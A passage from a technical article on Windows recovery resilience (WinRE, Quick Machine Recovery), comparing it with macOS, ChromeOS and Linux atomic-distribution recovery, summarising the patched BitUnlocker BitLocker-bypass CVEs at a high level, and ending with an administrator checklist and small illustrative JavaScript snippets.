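  return { repair, bridge };
}

console.log(chooseRecoveryAction({
  boots: false, targetedFixPublished: true,
  needsStateRollback: false, osRepairable: true, userBlocked: false,
}));
console.log(chooseRecoveryAction({
  boots: true, targetedFixPublished: false,
  needsStateRollback: true, osRepairable: true, userBlocked: true,
}));
```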

All five layers are anchored on Microsoft blogs and Microsoft Learn pages. None of them is unique to Microsoft. Apple, ChromeOS, and the Linux atomic distributions have each chosen a different layered architecture for the same problem. What does the field actually look like?

8. Competing Models: Apple, ChromeOS, and the Linux Atomic Distributions

Microsoft is not the first vendor to treat recovery as part of its security architecture. It is, at consumer scale, among the last. Apple, Google, and the Linux atomic-distribution community each picked a different layer to anchor on.

Apple macOS: Signed System Volume + paired/fallback recoveryOS + 1TR

macOS 10.15 (Catalina, 2019) introduced the read-only system volume. macOS 11 (Big Sur, 2020) added the Signed System Volume on top of it: a SHA-256 Merkle tree over every block of the system volume, sealed by Apple at install or update time [@apple-ssv]. On Apple Silicon, the bootloader verifies the seal before transferring control to the kernel; on Intel-based Macs with the T2 Security Chip, the bootloader forwards the measurement and signature to the kernel, which verifies the seal directly before mounting the root file system [@apple-ssv]. On verification failure, the Mac drops into recoveryOS automatically and prompts the user to reinstall.
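The sealing idea can be shown with a generic SHA-256 Merkle tree. This is a textbook construction, not Apple's on-disk format: the block contents, the pairing rule for an odd node, and the function names are assumptions made for the example.

```javascript
const crypto = require('crypto');

const sha256 = (buf) => crypto.createHash('sha256').update(buf).digest();

// Build a Merkle root: hash each block, then hash pairs of hashes upward
// until a single root remains.
function merkleRoot(blocks) {
  if (blocks.length === 0) throw new Error('need at least one block');
  let level = blocks.map(sha256);
  while (level.length > 1) {
    const next = [];
    for (let i = 0; i < level.length; i += 2) {
      // Assumption for this sketch: an unpaired last node is paired with itself.
      const right = level[i + 1] ?? level[i];
      next.push(sha256(Buffer.concat([level[i], right])));
    }
    level = next;
  }
  return level[0].toString('hex');
}

// Four stand-in "blocks" of a system volume.
const volume = ['kernel', 'libsystem', 'launchd', 'dyld'].map((s) => Buffer.from(s));
const seal = merkleRoot(volume); // computed once, at install or update time

const tampered = volume.slice();
tampered[2] = Buffer.from('launchd-modified'); // a single altered block

console.log('intact volume matches seal:  ', merkleRoot(volume) === seal);
console.log('tampered volume matches seal:', merkleRoot(tampered) === seal);
```

Changing any one block changes the root, so a verifier only needs to trust the signed root to detect modification anywhere in the volume.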

The recovery side has three flavours [@apple-boot]: a paired recoveryOS that exactly matches the installed system version; on Apple Silicon, a fallback recoveryOS (the previous OS version); and a hardware-anchored 1TR ("one true recovery") environment that survives even when the paired recoveryOS is broken. The 1TR environment is anchored in the Secure Enclave, which is the macOS analogue of Windows's signed bootmgfw.efi on the EFI System Partition.

What Apple excels at is tampered system files and failed updates: the first block read fails Merkle verification; the snapshot pointer flips to the prior good snapshot; the user reboots into a working system. What Apple does not have is an analogue of QMR's targeted remediation pipeline. The macOS answer to a faulty signed third-party security agent is "reinstall macOS". That is wipe-and-reload, not surgical repair.

ChromeOS: Verified Boot + A/B root partitions + auto-rollback

ChromeOS's verified-boot design has been the same since 2010 [@chromium-verified-boot]. A read-only boot stub, anchored in write-protected EEPROM, computes a cryptographic hash of the read-write firmware (SHA-1 in the original 2010 specification; SHA-256 in current production firmware) and verifies an RSA signature (at least 2048 bits) against a permanently stored public key [@chromium-verified-boot]. The verified read-write firmware then hashes the kernel and verifies its signed hashes. A transparent block device in the kernel verifies each block against a stored hash tree on every read, with the tree's root signed by the firmware.

The recovery story is the brilliant part. ChromeOS devices have two root partitions, ROOT-A and ROOT-B, plus a separate stateful partition for user data [@chromium-autoupdate]. Each root partition carries a remaining_attempts counter (default 6) stored in unused GPT bits next to the bootable flag. On N consecutive failed boots, the boot loader falls back to the other partition. Auto-updates always write to the partition not currently in use, never the booted one. The result is that ChromeOS recovers from a faulty signed system update in one reboot per device, automatically, without an operator action. This is the empirical upper bound on automation: no fielded platform recovers a signed-but-faulty boot path faster than one reboot.
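The fallback logic can be simulated in a few lines. The sketch follows the description above (two roots, a per-partition attempt counter, fallback when the counter is exhausted); the `bootSucceeds` callback and the object shape are hypothetical, and the real firmware logic has more state than this.

```javascript
// Simulation of A/B root selection with a per-partition attempt counter.
// bootSucceeds is a hypothetical stand-in for "the OS reached a healthy state".

function selectAndBoot(slots, active, bootSucceeds) {
  let reboots = 0;
  let current = active;
  while (true) {
    const slot = slots[current];
    if (slot.remainingAttempts === 0) {
      // Counter exhausted: fall back to the other root partition.
      const other = current === 'A' ? 'B' : 'A';
      if (slots[other].remainingAttempts === 0) return { booted: null, reboots };
      current = other;
      continue;
    }
    slot.remainingAttempts -= 1;
    reboots += 1;
    if (bootSucceeds(current)) return { booted: current, reboots };
  }
}

// ROOT-B just received a signed-but-faulty update; ROOT-A holds the prior image.
const slots = {
  A: { remainingAttempts: 6 },
  B: { remainingAttempts: 6 },
};
const result = selectAndBoot(slots, 'B', (name) => name === 'A');
console.log(result);
```

No operator appears anywhere in the loop, and the only external-media case is the one where both counters reach zero.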

Linux atomic distributions: OSTree, rpm-ostree, bootc

OSTree, the upstream of Fedora's atomic desktops and CoreOS, is "Git for operating system binaries" [@fedora-silverblue]. It stores content-addressed objects under /ostree/repo, builds atomic deployments as hardlink farms under /ostree/deploy/$stateroot/deploy/$checksum.$serial (each with a boot loader entry at /boot/loader/entries/ostree-$stateroot-$checksum.$serial.conf), performs a three-way merge of /etc between the booted deployment and the new one, and atomically swaps the boot directory by flipping a symlink between /ostree/boot.0 and /ostree/boot.1 [@ostree-atomic]. The crash-safe guarantee is verbatim: "if the system crashes or you pull the power, you will have either the old system, or the new one" [@ostree-atomic].
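The symlink flip is a general POSIX technique, sketched below in a temporary directory. This is not OSTree's code: the directory names merely echo the boot.0 / boot.1 convention, the helper name is hypothetical, and the sketch assumes a POSIX file system where rename() replaces its destination atomically.

```javascript
const fs = require('fs');
const os = require('os');
const path = require('path');

// Atomically repoint linkPath at target: create a temporary symlink next to it,
// then rename() it over the old one. A reader sees either the old link or the
// new link, never a missing one.
function flipSymlink(linkPath, target) {
  const tmp = linkPath + '.tmp-' + process.pid;
  fs.rmSync(tmp, { force: true });
  fs.symlinkSync(target, tmp);
  fs.renameSync(tmp, linkPath);
}

// Two stand-in deployments inside a scratch directory.
const root = fs.mkdtempSync(path.join(os.tmpdir(), 'atomic-swap-'));
fs.mkdirSync(path.join(root, 'boot.0'));
fs.mkdirSync(path.join(root, 'boot.1'));
fs.writeFileSync(path.join(root, 'boot.0', 'version'), 'old');
fs.writeFileSync(path.join(root, 'boot.1', 'version'), 'new');

const link = path.join(root, 'boot');
flipSymlink(link, 'boot.0'); // initial state
console.log('before:', fs.readFileSync(path.join(link, 'version'), 'utf8'));
flipSymlink(link, 'boot.1'); // the upgrade
console.log('after: ', fs.readFileSync(path.join(link, 'version'), 'utf8'));
```

The old deployment directory is untouched by the flip, which is what makes rollback a matter of pointing the link back.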

Fedora Silverblue, Fedora CoreOS, Endless OS, and (since 2024) Fedora's bootc container-based desktops all ship OSTree by default [@fedora-silverblue]. Where OSTree excels is server fleets and developer workstations; where it struggles is layered third-party packages crossing deployments (the rebase/deploy friction) and the absence of a network-reachable in-recovery remediation analogue to QMR.

Traditional Linux: dracut + GRUB rescue + initramfs

The "manual safe-mode + delete-the-file" model. A skilled operator with shell access plus iLO / iDRAC / IPMI serial-over-LAN can repair a Linux box; everyone else is in trouble. The CrowdStrike-style incident response on traditional Linux would look exactly the same as it did on Windows: per-device, skilled operator, no automation. The Linux distributions that did avoid this fate are the OSTree-based atomic ones; the conventional ones are at the same operator-bound floor Windows just climbed off.

flowchart TB
  subgraph WIN[Windows: WinRE + QMR]
    WIN_WIM[winre.wim on recovery partition or in OS-volume folder] --> WIN_WU[Windows Update endpoint]
  end
  subgraph APL[Apple: macOS]
    APL_PR[Paired recoveryOS] --> APL_SNAP[APFS snapshot revert]
    APL_FB[Fallback recoveryOS / 1TR in Secure Enclave] --> APL_SNAP
  end
  subgraph CHR[ChromeOS]
    CHR_BOOTA[ROOT-A] --> CHR_FALLBACK[Boot loader falls back to other root]
    CHR_BOOTB[ROOT-B] --> CHR_FALLBACK
  end
  subgraph OS[Linux atomic / OSTree]
    OS_DEPNEW[New deployment] --> OS_PRIOR[Prior deployment retained for rollback]
  end

A head-to-head comparison

The dimensions that matter are: year shipped, in-recovery network capability, auto-remediation, signed-but-faulty-driver protection, per-device operator cost during a fleet event, trust floor, and encrypted-volume recovery story.

| Dimension | Windows WinRE + QMR | Apple SSV + recoveryOS | ChromeOS A/B + verified boot | Linux atomic (OSTree) | Conventional Linux |
| --- | --- | --- | --- | --- | --- |
| Year shipped | WinRE 2007 [@wiki-winre]; QMR 2025 [@ms-qmr] | SSV 2020; recoveryOS / 1TR 2020 [@apple-ssv, @apple-boot] | Verified Boot 2010 [@chromium-verified-boot] | OSTree 2012 (dev started 2011); rpm-ostree later [@ostree-atomic, @fedora-silverblue] | dracut 2009; GRUB 2 2009 |
| In-recovery network capability | Yes (WPA/WPA2 Wi-Fi or wired) [@ms-qmr] | Yes for reinstall; no targeted remediation | Yes for recovery image fetch | No standard pipeline | No |
| Auto-remediation without operator | Yes (one-time or looped) [@ms-qmr] | No (user confirms reinstall) | Yes (boot loader fallback) [@chromium-autoupdate] | No (user selects rollback in GRUB) | No |
| Protection against signed-but-faulty drivers | Behavioural via MVI 3.0 SDP + user-mode AV [@ms-mvi, @ms-wri-jun-2025] | DriverKit / System Extensions push third parties out of kernel | A/B rollback auto-recovers in one boot cycle | Layered package rolls back with deployment | None |
| Per-device operator cost in a fleet event | O(1) -- publish remediation once | O(N) -- each user reinstalls | O(0) -- automatic per device | O(N) -- each user selects rollback | O(N) -- skilled operator per device |
| Trust floor (unrecoverable without external media) | Corrupted `bootmgfw.efi`, missing WinRE, lost BitLocker key | Failed 1TR (very rare) | Both root partitions plus EEPROM corrupted | GRUB unreachable | GRUB unreachable |
| Encrypted-volume recovery story | BitLocker recovery key required [@ms-qmr] | FileVault key required if at-rest read needed | Stateful partition holds user data only | LUKS passphrase required | LUKS passphrase required |

The notable row is the per-device operator cost during a fleet event. QMR moves Windows from O(N) (pre-WRI) to O(1) (post-WRI). ChromeOS was already at O(0) thanks to the A/B rollback. Apple, conventional Linux, and OSTree-based Linux remain at O(N).

Key idea: The per-device operator cost row is the one Microsoft engineered WRI to change. It is also the empirical justification for the thesis that resilience is a security property: pre-WRI Windows, despite shipping BitLocker, HVCI, and Secure Boot, had a recoverability complexity class worse than ChromeOS. A faulty signed driver could exploit that gap to deny service at fleet scale.

Three vendors got to fleet-scale recovery earlier. Microsoft's catch-up move is constrained by what Microsoft does not control: OEM partition layouts, BIOS/UEFI variance, BitLocker key escrow. Apple ships hardware-plus-OS and Google ships ChromeOS against an OEM-certified hardware spec, both of which let those vendors specify partition layout end to end. Microsoft ships the OS and asks OEMs to follow the Image Configuration Designer defaults; some do, some do not. The KB5028997 workaround for "recovery partition too small for new winre.wim" is precisely the artefact of Microsoft not being able to mandate the layout [@ms-winre-tech-ref, @ms-kb5028997]. Those constraints set hard limits on what WRI can fix, and they are the reason the trust-floor row in the table is longer for Windows than for ChromeOS.

9. Theoretical Limits and the BitUnlocker Counter-Current

Two well-known results from the systems and security literature say that no fielded recovery primitive can be perfect, and Microsoft's own offensive-research team demonstrated, at Black Hat USA 2025 in August 2025, exactly which limit WRI runs into [@alon-leviev].

The trust-floor lower bound

No system can recover from corruption of all of its boot-path code without external media, because the verification step that detects corruption is itself part of the boot-path code. ChromeOS encodes this with a write-protected EEPROM that an attacker cannot rewrite without a hardware write-protect override [@chromium-verified-boot]; Apple encodes it with the 1TR environment anchored in the Secure Enclave [@apple-boot]; Windows encodes it by requiring the EFI System Partition plus a signed bootmgfw.efi. Below that floor, QMR, OSTree, and APFS snapshots are all helpless. The recovery surface bounded by what fits in write-protected non-volatile storage is the lower bound on automated recovery.

The end-to-end argument applied to recovery

Saltzer, Reed, and Clark's 1984 End-to-End Arguments in System Design [@saltzer-reed-clark-1984] argued that correctness checks belong at the endpoints of a communication system, not in intermediate nodes. Applied to update pipelines, the argument predicts that bug-free updates cannot be guaranteed by intermediate nodes (the vendor's QA fleet, the CDN, the Windows Update service). Correctness can only be observed at the endpoint. The corollary is that the probability of a faulty update reaching production cannot be driven to zero by any amount of pre-release testing; the platform's design must instead bound blast radius and time-to-recovery of the faulty updates that will inevitably ship. MVI 3.0's SDP bounds the first (deployment rings); QMR bounds the second (network-reachable remediation). The argument is identical to the canary / progressive-rollout pattern in Google's SRE Book Release Engineering chapter [@sre-release-eng].

The attack-surface trade-off

An auto-unlocking, network-reachable recovery environment expands the Trusted Computing Base. Every additional capability added to the recovery path is a new code path; a new code path is a new attack vector. The BitUnlocker research, by Netanel Ben Simon and Alon Leviev at Microsoft's Security Testing and Offensive Research (STORM) team [@alon-leviev, @ms-bitunlocker-blog], is the most pointed evidence we have that the trade-off is real.

STORM -- Security Testing and Offensive Research at Microsoft -- is the internal red team. Their job is to break Microsoft products before someone else does. BitUnlocker was first presented at Black Hat USA 2025 and DEF CON 33, both in August 2025; the four CVEs were patched in the July 8, 2025 cumulative update, ahead of the disclosure [@alon-leviev, @ms-bitunlocker-blog]. The patches landed one Patch Tuesday cycle before QMR went generally available [@ms-wri-ignite-2025]. In the same summer, the same vendor that made WinRE reachable from Windows Update made WinRE harder to abuse.

Trusted Computing Base (TCB): The set of hardware, firmware, and software components on which a system's security policy ultimately depends. A bug in a TCB component can undermine the entire security policy; everything outside the TCB is, by definition, untrusted relative to it. Recovery environments expand the TCB because they need privileged access to encrypted user state.

The four BitUnlocker CVEs are all rated CVSS 6.8:

CVE-2025-48804 [@ms-bitunlocker-blog] -- BitLocker Security Feature Bypass via boot.sdi parsing.
CVE-2025-48003 [@ms-bitunlocker-blog] -- BitLocker Security Feature Bypass via SetupPlatform.exe / Shift+F10 abuse during the WinRE Apps Scheduled Operation.
CVE-2025-48800 [@ms-bitunlocker-blog] -- BitLocker Security Feature Bypass via tttracer.exe abuse during Offline Scanning.
CVE-2025-48818 [@ms-bitunlocker-blog] -- BitLocker Security Feature Bypass via BCD parsing in the Online PBR exploit chain; the fourth pillar of the chain.

The published Microsoft Security blog post on BitUnlocker enumerates the architectural attack surfaces verbatim under three section headings: Attacking Boot.sdi Parsing, Attacking ReAgent.xml Parsing, and Attacking Boot Configuration Data (BCD) Parsing [@ms-bitunlocker-blog]. The premise is the same in every case. WinRE must read the OS volume's BitLocker recovery material to perform repairs. Therefore WinRE has code paths that, given the right inputs, can obtain the decrypted Full Volume Encryption Key. The four CVEs each find a parser or debugger inside WinRE whose input handling can be steered by an attacker with brief physical access to flip the recovery flow into a state where the decrypted FVEK becomes reachable.

flowchart TD
  PA[Physical access foothold] --> SDI[Attacking boot.sdi parsing -- CVE-2025-48804]
  PA --> RA[Attacking ReAgent.xml / SetupPlatform.exe -- CVE-2025-48003]
  PA --> BCD[Attacking BCD parsing / Online PBR -- CVE-2025-48818]
  PA --> TT[Abusing tttracer.exe Offline Scanning -- CVE-2025-48800]
  SDI --> FVEK[Reach decrypted FVEK on OS volume]
  RA --> FVEK
  BCD --> FVEK
  TT --> FVEK
  FVEK --> EX[BitLocker bypass; data exfiltration]

The encrypted-volume impossibility

Unattended recovery of an encrypted volume without the key is impossible. It is a security correctness requirement, not a limitation that engineering can fix. QMR explicitly does not bypass BitLocker [@ms-qmr]. Apple's FileVault, ChromeOS's TPM-bound user partition, and Linux LUKS all share this property; none of them gets to be exempt from the requirement that the key be present somewhere before the encrypted volume can be modified offline.

Note: Every additional capability added to the recovery path is an additional attack vector against the encrypted user state that the recovery path is privileged to access. QMR's network reachability is a feature for the operator and a feature for the attacker. The article's thesis is not that WRI makes Windows safer in absolute terms; it is that WRI moves the trade-off to a different curve. The same vendor making the recovery surface reachable from Windows Update is the vendor that has to harden it against itself.

The upper bound

ChromeOS A/B auto-rollback recovers a single device in one reboot cycle without operator action [@chromium-autoupdate]. This is the empirical upper bound on automation. No fielded platform recovers a signed-but-faulty boot path faster than one reboot per device. QMR matches the ChromeOS upper bound in the steady state once a remediation is published; the only thing QMR cannot do that ChromeOS does is recover from the first signed-but-faulty update before Microsoft has authored the remediation. The lower bound on time-to-fleet-recovery is set by the production lead time of Microsoft's own QA pipeline plus the time to author and publish the targeted patch.

Microsoft's own offensive-research team found the BitUnlocker chain, and Microsoft patched it one Patch Tuesday before QMR went generally available. That is not a coincidence; it is the price of moving WinRE up the trust ladder. The next question -- what has not been priced yet? -- belongs in the open-problems list.

10. Open Problems: Where Microsoft Has Not Committed

WRI is a current commitment with a published roadmap. The roadmap has explicit holes. Each of the six below is documented from a primary Microsoft source -- either by what the source says or, in the most honest cases, by what it does not say.

Network protocol surface in WinRE. The Microsoft Learn QMR page is explicit: only wired Ethernet and WPA/WPA2 password-based Wi-Fi are supported as of November 2025 [@ms-qmr]. Enterprise 802.1X and WPA3-Enterprise with device certificates are committed in the November 18, 2025 update as coming soon under the Wi-Fi 7 for Enterprise and WinRE-reads-from-Windows lines, but no shipping date is published [@ms-wri-ignite-2025]. For an enterprise on 802.1X, this is the most visible gap: a managed-fleet device on a corporate SSID cannot reach Windows Update from inside WinRE today.

Safe-mode hardening as a discrete deliverable. The phrase "safe mode hardening" has no first-party Microsoft anchor as a discrete WRI deliverable. The closest documented item is Administrator Protection, announced in the November 19, 2024 Ignite blog as a constraint on elevated-context behaviour [@ms-wri-ignite-2024]. That is not the same thing. The Safe Mode boot path that responders used during the CrowdStrike incident to delete C-00000291*.sys is the same Safe Mode boot path that has existed since Windows NT; nothing in the WRI primary sources commits to changing what Safe Mode does or does not load. Honest reading: WRI re-prices the recovery surface around Safe Mode; it does not (yet) change Safe Mode itself.

Cross-vendor partition layout. The Microsoft Learn WinRE Technical Reference [@ms-winre-tech-ref] documents the recommended ICD-media layout but does not enforce it. Clean Windows Setup, OEM-installed Windows, and ICD-media-installed Windows produce different recovery-partition layouts, and the existence of KB5028997 (the well-known workaround for "recovery partition too small for the new winre.wim") is a direct consequence. ChromeOS and macOS do not have this problem because Google and Apple control the layout end to end. Microsoft chose, decades ago, not to.

Third-party MDM support for the WinRE plug-in model. The November 18, 2025 update describes the WinRE plug-in model as third-party-MDM-adoptable, but no third-party MDM vendor had shipped a plug-in or a QMR management surface as of that announcement [@ms-wri-ignite-2025]. Customers on JAMF, Workspace ONE, Tanium, or similar do not yet have a documented integration path. If the future of recovery is Intune-coupled, WRI's reach is bounded by Intune adoption.

BitLocker key escrow as a WRI deliverable. No WRI primary source ([@ms-wri-ignite-2024, @ms-wri-jun-2025, @ms-wri-ignite-2025]) names "BitLocker recovery key flows" as a discrete WRI deliverable. The adjacent items are: hardware-accelerated BitLocker on new devices starting spring 2026 [@ms-wri-ignite-2025]; the BitUnlocker CVE patches in July 2025 [@ms-bitunlocker-blog]; and the Entra ID self-service BitLocker recovery flow at aka.ms/aadrecoverykey [@ms-kb5042421]. The current state is that BitLocker key escrow is an Entra ID and Intune feature, not a WRI feature. QMR's value is bounded by BitLocker key availability for the encrypted-volume fraction of any fleet; a WRI deliverable that improved key escrow would compound QMR's benefit. None has been announced.

Recovery in air-gapped and sovereign environments. QMR routes through Windows Update. Air-gapped fleets, sovereign-cloud customers, and offline manufacturing networks cannot reach Windows Update from WinRE. The November 18, 2025 update mentions Connected Cache, but no QMR-Connected-Cache integration is committed [@ms-wri-ignite-2025]. For the high-assurance customer who today does not let manufacturing endpoints talk to the public Internet at all, QMR is a feature for someone else.
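The first and last gaps above reduce to one question: can a device sitting in WinRE reach Windows Update at all? The sketch below encodes the limits as described for November 2025. The `site` object and link-type labels are hypothetical names chosen for the example, and the supported set will need revising once the enterprise Wi-Fi commitments ship.

```javascript
// Sketch: can a device in WinRE reach Windows Update for QMR?
// Encodes the limits described above as of November 2025; input shape is hypothetical.

const SUPPORTED_LINKS = new Set(['ethernet', 'wifi-wpa-psk', 'wifi-wpa2-psk']);

function qmrReachability(site) {
  if (site.airGapped) {
    return { reachable: false, reason: 'no route to Windows Update' };
  }
  const usable = site.links.filter((l) => SUPPORTED_LINKS.has(l));
  if (usable.length === 0) {
    return { reachable: false, reason: 'only unsupported link types: ' + site.links.join(', ') };
  }
  return { reachable: true, via: usable[0] };
}

const sites = {
  headquarters: { airGapped: false, links: ['wifi-802.1x', 'wifi-wpa3-enterprise'] },
  branch: { airGapped: false, links: ['wifi-802.1x', 'wifi-wpa2-psk'] },
  plantFloor: { airGapped: true, links: ['ethernet'] },
};

for (const [name, site] of Object.entries(sites)) {
  console.log(name, qmrReachability(site));
}
```

The branch case is the practical workaround: a dedicated password-based recovery SSID alongside the 802.1X corporate network.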

Note: The six items above are gaps in the roadmap, anchored either by what Microsoft has explicitly named as coming-soon or by the absence of a primary source. They are not features. The article distinguishes Microsoft-committed deliverables (cited to a primary source) from adjacent inferences. Readers reviewing WRI for their own fleets should do the same.

These six gaps are where the next year of WRI roadmap will be argued. None of them is closed; some are closed-soon. For the practitioner, the immediate question is what to do, today, with what is shipping right now.

11. Practitioner's Guide

Everything above is architecture. This section is the checklist.

1. Verify WinRE is provisioned. Run `reagentc /info` from an elevated prompt. The output should say `Windows RE status: Enabled` and point at a sensible WinRE location -- typically `\\?\GLOBALROOT\device\harddisk0\partitionN\Recovery\WindowsRE` or `C:\Windows\System32\Recovery\WindowsRE`. If the status is `Disabled`, run `reagentc /enable`. If the recovery partition is too small for a new `winre.wim` (a known issue with cumulative updates that grow the image, logged as System event ID 4502 with ErrorPhase 2), follow KB5028997 [@ms-kb5028997, @ms-winre-tech-ref].

The mitigation, in outline: disable WinRE temporarily (`reagentc /disable`); shrink the OS partition via `diskpart` by enough megabytes (250 MB minimum per Microsoft's published procedure) to host a larger recovery partition; recreate the recovery partition with the GPT Type ID `DE94BBA4-06D1-4D40-A16A-BFD50179D6AC` and the GPT attributes value `0x8000000000000001` that hides it from automounting; re-enable WinRE (`reagentc /enable`) so the new `winre.wim` is copied into the resized partition. The Microsoft Support KB article carries the exact `diskpart` commands [@ms-kb5028997], with the Windows RE Technical Reference as the architectural anchor [@ms-winre-tech-ref]. Test on a representative device first; the resize is not reversible without re-imaging.

2. Audit your QMR posture before turning it on. On Enterprise, Education, and managed Pro, cloud remediation is off by default [@ms-qmr]. Decide first; ring second; roll out third. The Intune Settings Catalog path is Remote Remediation > Enable Cloud Remediation. Pre-stage a WPA/WPA2 Wi-Fi credential via reagentc.exe /SetRecoverySettings if your recovery network is wireless.

3. Use the test-mode dry run. reagentc.exe /SetRecoveryTestmode followed by reagentc.exe /BootToRe triggers a simulated QMR cycle. The simulated remediation appears in Settings > Windows Update > Update history rather than mutating the production OS. Run it on a pilot ring before depending on QMR in a real incident [@ms-qmr].

4. Plan for BitLocker key availability. Ensure recovery keys are escrowed to Entra ID, not just printed on a card in a drawer. Enable the Entra ID self-service flow at aka.ms/aadrecoverykey so an unattended user can retrieve their own key during an incident [@ms-kb5042421].

5. Know the difference between Cloud Reset, QMR, and Autopilot Reset. Cloud Reset (in-Windows Reset this PC > Cloud download) reinstalls a running OS [@ms-pbr-overview]. QMR runs in WinRE before the OS boots, applying targeted patches from Windows Update [@ms-qmr]. Autopilot Reset re-provisions a bootable device via Intune. Three different tools, three different scenarios; do not confuse them in your runbook.

6. Watch for the November 2025 Intune signals. Once Intune surfaces WinRE state in the admin centre, build the muscle of looking for it. The roll-up that tells you "12 devices are in WinRE right now" is the operational primitive Microsoft did not have through July 2024 [@ms-wri-ignite-2025].

Note: Promote step 3 (the test-mode dry run) into your incident-response runbook now [@ms-qmr]. The time to discover that the recovery Wi-Fi SSID changed last quarter is not in the middle of a fleet-down event.

Note: QMR cannot decrypt the OS volume. It applies Windows Update patches that take effect on the next boot, but it cannot run against an encrypted volume's contents without the BitLocker recovery key being available [@ms-qmr]. If a device's BitLocker key is not escrowed to Entra ID and the user is not available to read it from a printout, QMR cannot help. Key escrow is upstream of recovery; treat it that way.
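The preconditions scattered across the checklist and the two notes can be gathered into one pre-flight check. The block below is a minimal sketch under stated assumptions: the device record and its field names (`winreEnabled`, `cloudRemediationEnabled`, `recoveryNetwork`, `bitlockerEnabled`, `recoveryKeyEscrowed`) are hypothetical and would have to be populated from whatever inventory a fleet already has. The network rule reflects the QMR documentation cited in this article, which limits recovery networking to wired Ethernet and password-based WPA/WPA2 Wi-Fi.

```javascript
// Hypothetical device record: these field names are illustrative and do not
// correspond to any Intune, Microsoft Graph, or reagentc schema.
const SUPPORTED_RECOVERY_NETWORKS = new Set(['ethernet', 'wifi-wpa-psk', 'wifi-wpa2-psk']);

// Returns the list of reasons QMR would not help this device today.
function qmrBlockers(device) {
  const blockers = [];
  if (!device.winreEnabled) {
    blockers.push('WinRE is disabled (step 1: reagentc /enable)');
  }
  if (!device.cloudRemediationEnabled) {
    blockers.push('Cloud remediation is off (step 2)');
  }
  if (!SUPPORTED_RECOVERY_NETWORKS.has(device.recoveryNetwork)) {
    blockers.push('Recovery network is neither wired Ethernet nor password-based WPA/WPA2 Wi-Fi');
  }
  if (device.bitlockerEnabled && !device.recoveryKeyEscrowed) {
    blockers.push('BitLocker recovery key is not escrowed (step 4)');
  }
  return blockers;
}

const pilotDevice = {
  winreEnabled: true,
  cloudRemediationEnabled: false,
  recoveryNetwork: 'wifi-wpa3-enterprise',
  bitlockerEnabled: true,
  recoveryKeyEscrowed: true,
};
console.log(qmrBlockers(pilotDevice)); // two blockers: policy and network
```

An empty array means none of the blockers named in this section apply; it does not prove that a real QMR cycle will succeed, which is what the test-mode dry run in step 3 is for.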

The reagentc /info output is short and uniform enough that a small script can classify the device's WinRE health. The block below sketches one in JavaScript pseudocode.

```javascript
// reagentc /info is a small, deterministic text block. Parse it.

// Backslashes are doubled because this is a JavaScript template literal;
// the resulting string holds \\?\GLOBALROOT\device\...
const sampleOutput = `
Windows Recovery Environment (Windows RE) and system reset configuration
Information:

    Windows RE status:         Enabled
    Windows RE location:       \\\\?\\GLOBALROOT\\device\\harddisk0\\partition4\\Recovery\\WindowsRE
    Boot Configuration Data (BCD) identifier: a1b2c3d4-...-winre-guid
    Recovery image location:
    Recovery image index:      0
    Custom image location:
    Custom image index:        0

REAGENTC.EXE: Operation Successful.
`;

function classify(output) {
  const status = /Windows RE status:\s+(\w+)/.exec(output)?.[1];
  // [ \t]* keeps an empty location from swallowing the next line.
  const location = /Windows RE location:[ \t]*(\S*)/.exec(output)?.[1] || '';
  const partitionMatch = /partition(\d+)\\Recovery\\WindowsRE/.exec(location);
  const onPartition = !!partitionMatch;
  // Accepts C:\Recovery\WindowsRE and C:\Windows\System32\Recovery\WindowsRE.
  const onOsVolume = /^[A-Za-z]:\\(?:[^\\]+\\)*Recovery\\WindowsRE/.test(location);

  if (status !== 'Enabled') {
    return { status, action: 'reagentc /enable -- WinRE is not active' };
  }
  if (!onPartition && !onOsVolume) {
    return { status, action: 'Unknown layout; verify with diskpart and reagentc' };
  }
  if (onPartition) {
    return {
      status,
      layout: 'recovery-partition',
      partition: partitionMatch[1],
      note: 'If cumulative updates fail with insufficient-space errors, see KB5028997',
    };
  }
  return {
    status,
    layout: 'os-volume-recovery-folder',
    note: 'OEM-style layout; some Intune policies assume a separate partition. ' +
      'Confirm before relying on remote remediation.',
  };
}

console.log(classify(sampleOutput));
```

The practical questions answered, the article closes with a set of FAQs that catch the common misconceptions.

12. Frequently Asked Questions and Closing Thoughts

No. WRI's *Windows endpoint security platform* gives MVI partners a user-mode runtime so their detection logic does not have to live in a kernel-mode `.sys` file [@ms-wri-jun-2025, @ms-wri-ignite-2025]. Kernel-mode drivers as a class are not retired: the November 18, 2025 update is explicit that "graphics drivers, for example, will continue to run in kernel mode for performance reasons" [@ms-wri-ignite-2025], and the driver-resiliency playbook (compiler safeguards, driver isolation, DMA-remapping, higher signing bar) is precisely for the kernel-mode surface that will remain.

No. The Microsoft Learn QMR page is explicit that the recovery flow does not decrypt the OS volume [@ms-qmr]. If the BitLocker recovery key is unavailable, QMR cannot help. The recommended escrow path is Entra ID, with the user-facing self-service flow at `aka.ms/aadrecoverykey` [@ms-kb5042421].

No. The BCD Boot Options Reference enumerates every legal element on a boot entry, and there is no `/recovery` flag on `winload.efi` or `winload.exe` [@ms-bcd]. WinRE is selected by following the `recoverysequence` element of the OS-loader entry to a separate BCD entry whose `winpe` is `Yes` and whose `osdevice` mounts `winre.wim` from a `boot.sdi`-backed RAM disk. The entire handoff is inside the boot manager, before `winload.efi` runs.

No. The four CVE-2025-48800/-48003/-48804/-48818 advisories were patched in the July 8, 2025 cumulative update before QMR went generally available in August 2025 [@ms-bitunlocker-blog, @ms-wri-ignite-2025]. The patches addressed parser and debugger code paths inside WinRE; they did not remove WinRE's ability to read the OS volume's BitLocker recovery material, which is a feature WinRE needs in order to perform any repair on an encrypted volume.

No. The Secure Future Initiative (SFI), announced in November 2023, is Microsoft's company-wide security program. WRI is the Windows-specific workstream inside SFI that owns Windows availability, kernel resilience, and the recovery surface; the published WRI blogs frame it as the Windows pillar of SFI rather than a stand-alone effort [@ms-wri-ignite-2024, @ms-wri-jun-2025].

QMR will not connect. The Microsoft Learn page is explicit that only wired Ethernet and WPA/WPA2 password-based Wi-Fi are supported [@ms-qmr]. The November 18, 2025 update commits to WPA3-Enterprise with device certificates as part of the WinRE-reads-from-Windows networking work and the *Wi-Fi 7 for Enterprise* line, but it does not give a shipping date [@ms-wri-ignite-2025]. For now, enterprises whose recovery story depends on QMR over Wi-Fi must either stand up a dedicated WPA2-PSK recovery SSID or rely on wired recovery.

